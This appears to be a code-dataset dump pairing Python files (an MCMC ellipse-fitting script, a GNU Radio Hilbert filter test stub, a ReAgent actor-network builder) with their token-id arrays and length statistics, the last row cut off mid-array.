mles_param_dict['xc'], mles_param_dict['yc'], mles_param_dict['zc'], mles_param_dict['r'], mles_param_dict['xE'], mles_param_dict['yE'], mles_param_dict['zE'] = tup
mles_param_dict['rSig'] = gen_r_sig_3d.gen_r_sig_3d(data, mles_param_dict, prior)
mles_param_dict['sInG'], mles_param_dict['sInGIndex'], mles_param_dict['sOutGIndex'] = gen_selection_in_g_3d.gen_selection_in_g_3d(data, mles_param_dict, prior)
if n > args.burnin:
param_ss.set_params(mles_param_dict)
# param_ss = storeParam3D(ParamSS, param_dict)
log_fh.close()
# Summarize Parameter and print reports
param_ss.summarize_params(args.sample)
param_ss.output_csv(args.output_csv_dir, cell_id)
param_ss.output_json(args.output_json_dir, cell_id)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
198,
11748,
1822,
29572,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
28686,
198,
198,
11748,
1366,
62,
26791,
198,
11748,
285,
293,
62,
2777,
1456,
198,
11748,
2429,
62,
2777,
1456,
198,
11748,
2429,
62,
2777,
1456,
62,
25928,
198,
11748,
2429,
62,
81,
62,
82,
328,
62,
18,
67,
198,
11748,
2429,
62,
49283,
62,
259,
62,
70,
62,
18,
67,
198,
11748,
20731,
198,
11748,
5772,
62,
824,
198,
11748,
285,
293,
62,
3448,
669,
62,
18,
67,
198,
198,
7206,
38865,
62,
44,
2538,
62,
4303,
39,
9338,
62,
27082,
2390,
62,
35,
18379,
796,
8633,
7,
25306,
28,
15,
11,
331,
66,
28,
15,
11,
1976,
66,
28,
15,
11,
374,
28,
16,
11,
374,
50,
328,
28,
15,
13,
18,
11,
2124,
36,
28,
16,
13,
17,
11,
331,
36,
28,
16,
11,
1976,
36,
28,
15,
13,
23,
8,
198,
10761,
2389,
796,
45941,
13,
18747,
26933,
12,
18,
11,
532,
17,
11,
532,
16,
11,
352,
11,
362,
11,
513,
12962,
198,
6173,
21358,
37,
10659,
1581,
796,
352,
628,
628,
198,
198,
48610,
796,
1822,
29572,
13,
28100,
1713,
46677,
3419,
198,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
10899,
259,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
10899,
259,
3256,
2099,
28,
600,
11,
2672,
28,
25101,
11,
4277,
28,
9031,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
15414,
62,
15908,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
15414,
62,
15908,
3256,
1037,
11639,
43055,
286,
5128,
269,
21370,
2939,
966,
3696,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
77,
41339,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
77,
41339,
3256,
2099,
28,
600,
11,
2672,
28,
25101,
11,
4277,
28,
21,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
22915,
62,
40664,
62,
15908,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
22915,
62,
40664,
62,
15908,
3256,
1037,
11639,
43055,
284,
5072,
269,
21370,
3696,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
22915,
62,
17752,
62,
15908,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
22915,
62,
17752,
62,
15908,
3256,
1037,
11639,
43055,
284,
5072,
33918,
3696,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
22915,
62,
6404,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
22915,
62,
6404,
3256,
1037,
11639,
26410,
1429,
2604,
2393,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
29487,
14989,
942,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
29487,
14989,
942,
3256,
2099,
28,
30388,
11,
2672,
28,
25101,
11,
4277,
28,
25101,
11,
1037,
11639,
43328,
5538,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
25120,
10434,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
25120,
10434,
3256,
2099,
28,
30388,
11,
2672,
28,
25101,
11,
4277,
28,
17821,
11,
1037,
11639,
5211,
407,
779,
5550,
38865,
62,
44,
2538,
62,
4303,
39,
9338,
62,
27082,
2390,
62,
35,
18379,
11537,
198,
48610,
13,
2860,
62,
49140,
7203,
438,
13049,
49,
1600,
2223,
11639,
8095,
3256,
2244,
11639,
13049,
49,
3256,
2099,
28,
30388,
11,
2672,
28,
25101,
11,
4277,
28,
17821,
11,
1037,
2625,
3673,
1654,
4943,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
39873,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
39873,
3256,
2099,
28,
600,
11,
2672,
28,
25101,
11,
4277,
28,
9031,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
40871,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
40871,
3256,
2099,
28,
600,
11,
2672,
28,
25101,
11,
4277,
28,
940,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
87,
51,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
87,
51,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
88,
51,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
88,
51,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
89,
51,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
89,
51,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
81,
51,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
81,
51,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
87,
2767,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
87,
2767,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
88,
2767,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
88,
2767,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
48610,
13,
2860,
62,
49140,
10786,
438,
89,
2767,
559,
3256,
2223,
11639,
8095,
3256,
2244,
11639,
89,
2767,
559,
3256,
2099,
28,
22468,
11,
2672,
28,
25101,
11,
4277,
28,
15,
13,
486,
11,
1037,
11639,
3673,
1654,
11537,
198,
198,
22046,
796,
30751,
13,
29572,
62,
22046,
3419,
198,
17143,
62,
11600,
796,
651,
62,
17143,
62,
11600,
7,
22046,
8,
198,
198,
2,
16926,
46,
25,
299,
4971,
7248,
796,
6640,
198,
198,
6404,
62,
69,
71,
796,
1280,
7,
22046,
13,
22915,
62,
6404,
11,
366,
86,
4943,
198,
198,
1640,
2393,
62,
3672,
287,
23243,
7,
418,
13,
4868,
15908,
7,
22046,
13,
15414,
62,
15908,
8,
2599,
198,
220,
220,
220,
2393,
62,
6978,
796,
28686,
13,
6978,
13,
397,
2777,
776,
7,
418,
13,
6978,
13,
22179,
7,
22046,
13,
15414,
62,
15908,
11,
2393,
62,
3672,
4008,
198,
220,
220,
220,
1303,
29677,
262,
2685,
62,
312,
422,
262,
2393,
1438,
13,
198,
220,
220,
220,
2685,
62,
312,
796,
651,
62,
8692,
62,
7753,
62,
3672,
7,
7753,
62,
3672,
8,
628,
220,
220,
220,
1303,
8778,
393,
7716,
18512,
1241,
900,
1366,
198,
220,
220,
220,
1303,
611,
42287,
62,
11600,
17816,
5235,
6601,
6,
5974,
198,
220,
220,
220,
611,
10352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16926,
46,
25,
1366,
796,
2429,
38882,
4971,
7248,
7,
7206,
38865,
62,
44,
2538,
62,
4303,
39,
9338,
62,
27082,
2390,
62,
35,
18379,
11,
5421,
278,
62,
3524,
11,
5772,
62,
11600,
11,
299,
4971,
7248,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1612,
49,
796,
685,
15,
11,
657,
11,
657,
60,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16926,
46,
25,
3613,
7,
6836,
73,
40069,
13,
15414,
8979,
4971,
7248,
6601,
44,
4032,
7890,
11537,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
1366,
62,
26791,
13,
2220,
62,
1831,
18,
67,
62,
7890,
7,
7753,
62,
6978,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
5962,
642,
1366,
2173,
878,
3487,
1634,
25,
23884,
59,
77,
1911,
18982,
7,
7890,
58,
25,
20,
60,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1366,
11,
1612,
49,
796,
1366,
62,
26791,
13,
11265,
1096,
62,
7890,
7,
7890,
11,
2604,
62,
69,
71,
8,
198,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
59,
77,
5962,
642,
1366,
2173,
706,
3487,
1634,
25,
23884,
59,
77,
59,
77,
1911,
18982,
7,
7890,
58,
25,
20,
60,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
32604,
16874,
23884,
1911,
18982,
7,
32604,
49,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
16926,
46,
25,
299,
4971,
7248,
796,
1366,
13,
43358,
58,
15,
60,
628,
220,
220,
220,
1303,
5345,
10638,
10007,
198,
220,
220,
220,
5772,
62,
824,
796,
5772,
62,
824,
13,
22973,
5432,
7,
7890,
13,
43358,
58,
15,
4357,
1612,
49,
8,
628,
220,
220,
220,
1303,
17962,
1988,
329,
10007,
198,
220,
220,
220,
611,
5772,
62,
11600,
17816,
25120,
10434,
6,
5974,
198,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
796,
285,
293,
62,
2777,
1456,
13,
76,
293,
62,
2777,
1456,
7,
7890,
11,
2685,
62,
312,
11,
5772,
62,
11600,
11,
2604,
62,
69,
71,
8,
198,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
796,
5550,
38865,
62,
44,
2538,
62,
4303,
39,
9338,
62,
27082,
2390,
62,
35,
18379,
628,
220,
220,
220,
1303,
5345,
4389,
669,
198,
220,
220,
220,
3161,
796,
285,
293,
62,
3448,
669,
62,
18,
67,
13,
44,
2538,
47,
8657,
18,
35,
7,
66,
5308,
272,
41888,
76,
829,
62,
17143,
62,
11600,
17816,
25306,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
88,
66,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
89,
66,
20520,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
269,
1273,
67,
41888,
16,
11,
352,
11,
352,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
374,
5308,
272,
28,
76,
829,
62,
17143,
62,
11600,
17816,
81,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
374,
1273,
67,
28,
15,
13,
16,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
304,
5308,
272,
41888,
76,
829,
62,
17143,
62,
11600,
17816,
87,
36,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
88,
36,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
89,
36,
20520,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
304,
1273,
67,
41888,
16,
11,
352,
11,
352,
12962,
628,
220,
220,
220,
1303,
13122,
9655,
14691,
198,
220,
220,
220,
329,
299,
287,
2837,
7,
22046,
13,
10899,
259,
1343,
26498,
13,
39873,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
611,
357,
37659,
13,
4666,
7,
77,
11,
26498,
13,
40871,
8,
6624,
657,
393,
299,
6624,
657,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
59,
20471,
23884,
59,
77,
1911,
18982,
7,
77,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
66,
11187,
7594,
20520,
796,
20731,
13,
9948,
66,
62,
6404,
62,
2339,
62,
2777,
1456,
62,
19816,
7,
76,
829,
62,
17143,
62,
11600,
17816,
25306,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
88,
66,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
89,
66,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
87,
36,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
88,
36,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
89,
36,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
81,
6,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
58,
76,
829,
62,
17143,
62,
11600,
17816,
82,
818,
38,
15732,
6,
4357,
1058,
4357,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
81,
50,
328,
6,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
59,
21533,
829,
62,
17143,
62,
11600,
7479,
77,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
66,
11187,
7594,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
66,
11187,
7594,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
25306,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
25306,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
88,
66,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
88,
66,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
89,
66,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
89,
66,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
81,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
81,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
87,
36,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
87,
36,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
88,
36,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
88,
36,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
89,
36,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
89,
36,
20520,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2604,
62,
69,
71,
13,
13564,
7203,
81,
50,
328,
23884,
59,
77,
1911,
18982,
7,
76,
829,
62,
17143,
62,
11600,
17816,
81,
50,
328,
20520,
4008,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
26498,
13,
29487,
14989,
942,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1208,
628,
220,
220,
220,
220,
220,
220,
220,
256,
929,
796,
2429,
62,
2777,
1456,
13,
5235,
62,
2777,
1456,
7,
7890,
11,
285,
829,
62,
17143,
62,
11600,
11,
3161,
11,
5772,
62,
11600,
8,
198,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
25306,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
88,
66,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
89,
66,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
81,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
87,
36,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
88,
36,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
89,
36,
20520,
796,
256,
929,
198,
220,
220,
220,
220,
220,
220,
220,
256,
929,
796,
2429,
62,
2777,
1456,
62,
25928,
13,
5235,
62,
2777,
1456,
62,
25928,
7,
7890,
11,
285,
829,
62,
17143,
62,
11600,
11,
3161,
11,
5772,
62,
11600,
11,
6374,
21358,
37,
10659,
1581,
8,
198,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
25306,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
88,
66,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
89,
66,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
81,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
87,
36,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
88,
36,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
89,
36,
20520,
796,
256,
929,
198,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
81,
50,
328,
20520,
796,
2429,
62,
81,
62,
82,
328,
62,
18,
67,
13,
5235,
62,
81,
62,
82,
328,
62,
18,
67,
7,
7890,
11,
285,
829,
62,
17143,
62,
11600,
11,
3161,
8,
198,
220,
220,
220,
220,
220,
220,
220,
285,
829,
62,
17143,
62,
11600,
17816,
82,
818,
38,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
82,
818,
38,
15732,
6,
4357,
285,
829,
62,
17143,
62,
11600,
17816,
82,
7975,
38,
15732,
20520,
796,
2429,
62,
49283,
62,
259,
62,
70,
62,
18,
67,
13,
5235,
62,
49283,
62,
259,
62,
70,
62,
18,
67,
7,
7890,
11,
285,
829,
62,
17143,
62,
11600,
11,
3161,
8,
628,
220,
220,
220,
220,
220,
220,
220,
611,
299,
1875,
26498,
13,
10899,
259,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
5772,
62,
824,
13,
2617,
62,
37266,
7,
76,
829,
62,
17143,
62,
11600,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
5772,
62,
824,
796,
3650,
22973,
18,
35,
7,
22973,
5432,
11,
5772,
62,
11600,
8,
628,
220,
220,
220,
2604,
62,
69,
71,
13,
19836,
3419,
628,
220,
220,
220,
1303,
5060,
3876,
1096,
25139,
2357,
290,
3601,
3136,
198,
220,
220,
220,
5772,
62,
824,
13,
16345,
3876,
1096,
62,
37266,
7,
22046,
13,
39873,
8,
198,
220,
220,
220,
5772,
62,
824,
13,
22915,
62,
40664,
7,
22046,
13,
22915,
62,
40664,
62,
15908,
11,
2685,
62,
312,
8,
198,
220,
220,
220,
5772,
62,
824,
13,
22915,
62,
17752,
7,
22046,
13,
22915,
62,
17752,
62,
15908,
11,
2685,
62,
312,
8,
198
] | 2.004286 | 3,733 |
#!/usr/bin/env python
#
# Copyright 2004,2007,2010,2012,2013 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, filter, blocks
import math
if __name__ == '__main__':
gr_unittest.run(test_hilbert, "test_hilbert.xml")
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
198,
2,
15069,
5472,
11,
12726,
11,
10333,
11,
6999,
11,
6390,
3232,
10442,
5693,
11,
3457,
13,
198,
2,
198,
2,
770,
2393,
318,
636,
286,
22961,
8829,
198,
2,
198,
2,
22961,
8829,
318,
1479,
3788,
26,
345,
460,
17678,
4163,
340,
290,
14,
273,
13096,
198,
2,
340,
739,
262,
2846,
286,
262,
22961,
3611,
5094,
13789,
355,
3199,
416,
198,
2,
262,
3232,
10442,
5693,
26,
2035,
2196,
513,
11,
393,
357,
265,
534,
3038,
8,
198,
2,
597,
1568,
2196,
13,
198,
2,
198,
2,
22961,
8829,
318,
9387,
287,
262,
2911,
326,
340,
481,
307,
4465,
11,
198,
2,
475,
42881,
15529,
34764,
56,
26,
1231,
772,
262,
17142,
18215,
286,
198,
2,
34482,
3398,
1565,
5603,
25382,
393,
376,
46144,
7473,
317,
16652,
2149,
37232,
33079,
48933,
13,
220,
4091,
262,
198,
2,
22961,
3611,
5094,
13789,
329,
517,
3307,
13,
198,
2,
198,
2,
921,
815,
423,
2722,
257,
4866,
286,
262,
22961,
3611,
5094,
13789,
198,
2,
1863,
351,
22961,
8829,
26,
766,
262,
2393,
27975,
45761,
13,
220,
1002,
407,
11,
3551,
284,
198,
2,
262,
3232,
10442,
5693,
11,
3457,
1539,
6885,
14021,
3530,
11,
198,
2,
6182,
11,
8779,
657,
2481,
940,
12,
1485,
486,
11,
4916,
13,
198,
2,
198,
198,
6738,
19967,
333,
324,
952,
1330,
1036,
11,
1036,
62,
403,
715,
395,
11,
8106,
11,
7021,
198,
11748,
10688,
198,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1036,
62,
403,
715,
395,
13,
5143,
7,
9288,
62,
71,
346,
4835,
11,
366,
9288,
62,
71,
346,
4835,
13,
19875,
4943,
198
] | 3.422535 | 284 |
#!/usr/bin/env python3
import abc
from typing import List
import torch
from reagent.core.fb_checker import IS_FB_ENVIRONMENT
from reagent.core.registry_meta import RegistryMeta
from reagent.models.base import ModelBase
from reagent.parameters import NormalizationData
from reagent.prediction.predictor_wrapper import ActorWithPreprocessor
from reagent.preprocessing.preprocessor import Preprocessor
if IS_FB_ENVIRONMENT:
from reagent.fb.prediction.fb_predictor_wrapper import (
FbActorPredictorWrapper as ActorPredictorWrapper,
)
else:
from reagent.prediction.predictor_wrapper import ActorPredictorWrapper
class DiscreteActorNetBuilder(metaclass=RegistryMeta):
"""
Base class for discrete actor net builder.
"""
@abc.abstractmethod
def build_serving_module(
self,
actor: ModelBase,
state_normalization_data: NormalizationData,
action_feature_ids: List[int],
) -> torch.nn.Module:
"""
Returns a TorchScript predictor module
"""
state_preprocessor = Preprocessor(
state_normalization_data.dense_normalization_parameters, use_gpu=False
)
actor_with_preprocessor = ActorWithPreprocessor(
actor.cpu_model().eval(),
state_preprocessor,
)
return ActorPredictorWrapper(actor_with_preprocessor, action_feature_ids)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
11748,
450,
66,
198,
6738,
19720,
1330,
7343,
198,
198,
11748,
28034,
198,
6738,
302,
25781,
13,
7295,
13,
21855,
62,
9122,
263,
1330,
3180,
62,
26001,
62,
1677,
53,
4663,
1340,
10979,
198,
6738,
302,
25781,
13,
7295,
13,
2301,
4592,
62,
28961,
1330,
33432,
48526,
198,
6738,
302,
25781,
13,
27530,
13,
8692,
1330,
9104,
14881,
198,
6738,
302,
25781,
13,
17143,
7307,
1330,
14435,
1634,
6601,
198,
6738,
302,
25781,
13,
28764,
2867,
13,
79,
17407,
273,
62,
48553,
1330,
27274,
3152,
6719,
41341,
198,
6738,
